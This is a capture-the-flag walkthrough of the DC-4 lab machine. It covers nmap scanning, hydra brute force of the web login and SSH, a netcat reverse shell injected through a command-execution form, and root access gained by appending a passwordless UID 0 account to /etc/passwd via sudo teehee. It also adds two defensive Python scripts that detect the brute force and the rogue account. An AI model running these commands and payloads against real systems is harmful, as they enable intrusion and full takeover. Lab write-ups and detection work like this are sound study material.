1. nmap -sP 192.168.0.103/24  As usual, start by sweeping the LAN for live hosts; the target is identified as 192.168.0.151
sudo arp-scan -l seems to work for this as well
2. nmap -A -p 1-65535 192.168.0.151  Port scan: 22 and 80 are open
3. Run dirb; nothing of interest. Open port 80 in the browser, and the page hints that the username is admin
4. Brute-force the password, with either Burp or hydra
I don't know hydra yet, so I'm leaving a marker here and will come back to the hydra brute force once I've learned it; the wordlist is /usr/share/john/password.lst; see reference articles 1, 2, 3, 4
After fiddling for a whole afternoon it somehow worked, so there's no need for Burp: hydra -l admin -P /usr/share/john/password.lst -f 192.168.0.151 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout"
5. The brute force yields admin:happy. Log in and poke around; the only thing there seems to be a command execution vulnerability
6. nc -lvp 4444  Listen on the attacker machine;
radio=nc+-e+/bin/sh+192.168.0.101+4444&submit=Run  Intercept the request from the target and modify it to get a reverse shell; nc -e redirects the program's input and output to the connection
7. After looking around for ages, the only useful thing I found was /home/jim/backups/old-passwords.bak, a list of old passwords. Sending it back to Kali with nc failed, so I just copied and pasted it and saved it as passwd.txt
8. hydra -L /root/Desktop/user.txt -P /root/Desktop/passwd.txt ssh://192.168.0.100  The brute force yields the password jim:jibril04
9. Log in, and an email in /var/mail/jim reveals a new username and password, charles:^xHhA&hvim0y
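The hydra run above relies on two things a defender can see in the web server's access log: a burst of near-identical POSTs to /login.php from one client, and then one reply whose size differs (the "S=logout" success condition means the logged-in page looks different from the failure page). The following Python detector is an added example, not part of the original write-up; it assumes Apache combined log format, and the log lines, IP addresses, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Apache combined-format access log (not captured from the DC-4 box):
# one client hammers /login.php and its seventh POST gets a different-sized
# reply, the way a successful guess does; a second client logs in normally.
SAMPLE_ACCESS_LOG = """\
192.168.0.101 - - [06/Apr/2019:21:10:01 +1000] "POST /login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"
192.168.0.55 - - [06/Apr/2019:21:10:01 +1000] "GET /index.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
192.168.0.101 - - [06/Apr/2019:21:10:02 +1000] "POST /login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"
192.168.0.101 - - [06/Apr/2019:21:10:02 +1000] "POST /login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"
192.168.0.101 - - [06/Apr/2019:21:10:03 +1000] "POST /login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"
192.168.0.55 - - [06/Apr/2019:21:10:04 +1000] "POST /login.php HTTP/1.1" 200 2789 "-" "Mozilla/5.0"
192.168.0.101 - - [06/Apr/2019:21:10:04 +1000] "POST /login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"
192.168.0.101 - - [06/Apr/2019:21:10:05 +1000] "POST /login.php HTTP/1.1" 200 1534 "-" "Mozilla/5.0 (Hydra)"
192.168.0.101 - - [06/Apr/2019:21:10:06 +1000] "POST /login.php HTTP/1.1" 200 2789 "-" "Mozilla/5.0 (Hydra)"
"""

# Apache combined format: ip ident user [timestamp] "method path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)


def parse_line(line):
    """Parse one access log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["size"] = None if rec["size"] == "-" else int(rec["size"])
    return rec


def detect_login_bruteforce(lines, path="/login.php", threshold=5, window_seconds=60):
    """Flag clients that POST to `path` at least `threshold` times within a
    sliding window of `window_seconds`. For each flagged client, report the
    time the burst started, its total POST count, and any response sizes that
    differ from the dominant one (a likely successful guess)."""
    recent = defaultdict(deque)   # ip -> timestamps of POSTs inside the window
    sizes = defaultdict(list)     # ip -> response size of every POST seen
    alerts = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != path:
            continue
        ip, ts = rec["ip"], rec["ts"]
        window = recent[ip]
        window.append(ts)
        while (ts - window[0]).total_seconds() > window_seconds:
            window.popleft()
        sizes[ip].append(rec["size"])
        if len(window) >= threshold and ip not in alerts:
            alerts[ip] = {"first": window[0], "attempts": 0, "outliers": []}
    # Second pass per flagged client: total attempts and odd-one-out reply sizes
    for ip, alert in alerts.items():
        seen = sizes[ip]
        dominant = max(set(seen), key=seen.count)
        alert["attempts"] = len(seen)
        alert["outliers"] = [s for s in seen if s != dominant]
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_login_bruteforce(SAMPLE_ACCESS_LOG.splitlines()).items():
        print(f"{ip}: {alert['attempts']} POSTs to /login.php from "
              f"{alert['first']:%H:%M:%S}, differing replies: {alert['outliers']}")
```

A real deployment would read the live log, tune the threshold to the site's normal login rate, and act on the outlier (that request is the one to look at in the application's own login audit). Rate limiting or lockout on /login.php removes the condition the attack needs in the first place.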
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
10. Log in and run sudo -l: we are allowed to run /usr/bin/teehee. Run teehee --help to see what the command does. teehee -a appears to append data to a file, so try creating an admin account: $ echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd
11. That creates an account with the highest privileges. su admin to switch to it, id to check that it worked, then cd /root to look for the flag.
888 888 888 888 8888888b. 888 888 888 888
888 o 888 888 888 888 "Y88b 888 888 888 888
888 d8b 888 888 888 888 888 888 888 888 888
888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888
888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888 888 888 888
88888P Y88888 88888888 888 888 888 888 888 888 888 888 88888888 Y8P Y8P Y8P Y8P
8888P Y8888 Y8b. 888 888 888 .d88P Y88..88P 888 888 Y8b. " " " "
888P Y888 "Y8888 888 888 8888888P" "Y88P" 888 888 "Y8888 888 888 888 888
Congratulations!!!
Hope you enjoyed DC-4. Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.
If you enjoyed this CTF, send me a tweet via @DCAU7.
Takeaways
1. Learned how to brute-force with hydra
2. nc listener and reverse shell, although the file transfer failed
3. echo "admin::0:0:::/bin/sh" | sudo teehee -a /etc/passwd to create a new user
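The appended line in takeaway 3 leaves two artefacts that a host audit should catch: a second UID 0 account besides root, and an empty password field. The root cause is the sudo rule that lets a file-appending utility run as root, but the passwd file itself is the easiest place to detect the result. The script below is an added example, not code from the original write-up; the /etc/passwd content is constructed and the finding codes are this example's own names.

```python
# Constructed /etc/passwd content (not copied from the DC-4 box): a normal root
# entry, a service account, two users, and the "admin::0:0:::/bin/sh" line that
# the walkthrough appends with teehee -a.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
jim:x:1001:1001:Jim,,,:/home/jim:/bin/bash
charles:x:1002:1002:Charles,,,:/home/charles:/bin/bash
admin::0:0:::/bin/sh
"""

# Finding codes returned by audit_passwd() (names chosen for this example)
UID0_NOT_ROOT = "uid-0-not-root"    # an extra superuser account
EMPTY_PASSWORD = "empty-password"   # second field empty: login needs no password
MALFORMED = "malformed"             # not seven colon-separated fields


def parse_passwd(text):
    """Parse passwd(5) text into one dict per entry; malformed lines are kept and flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            entries.append({"line": lineno, "name": fields[0], "malformed": True})
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        entries.append({"line": lineno, "name": name, "pw": pw, "uid": uid,
                        "gid": gid, "gecos": gecos, "home": home, "shell": shell,
                        "malformed": False})
    return entries


def audit_passwd(text):
    """Return (line_number, account_name, finding_code) tuples for suspicious entries."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append((e["line"], e["name"], MALFORMED))
            continue
        # Any account whose numeric UID is 0 is root, whatever it is called
        if e["uid"].isdigit() and int(e["uid"]) == 0 and e["name"] != "root":
            findings.append((e["line"], e["name"], UID0_NOT_ROOT))
        # "x" means the hash lives in /etc/shadow; an empty field means no password at all
        if e["pw"] == "":
            findings.append((e["line"], e["name"], EMPTY_PASSWORD))
    return findings


def new_accounts(baseline_text, current_text):
    """Names present in the current file but not in a trusted baseline copy;
    this is how a file-integrity check notices an appended account."""
    before = {e["name"] for e in parse_passwd(baseline_text)}
    after = {e["name"] for e in parse_passwd(current_text)}
    return after - before


if __name__ == "__main__":
    for line, name, code in audit_passwd(SAMPLE_PASSWD):
        print(f"line {line}: {name}: {code}")
    # Baseline = the same file before the last line was appended
    baseline = "\n".join(SAMPLE_PASSWD.splitlines()[:-1]) + "\n"
    print("new accounts:", new_accounts(baseline, SAMPLE_PASSWD))
```

Run against the real file with open("/etc/passwd").read(); the baseline for new_accounts() would come from a known-good copy or a configuration management system. Tightening the sudo rule (no root-level write or append utilities for unprivileged users) is the fix; the audit is the check that the fix held.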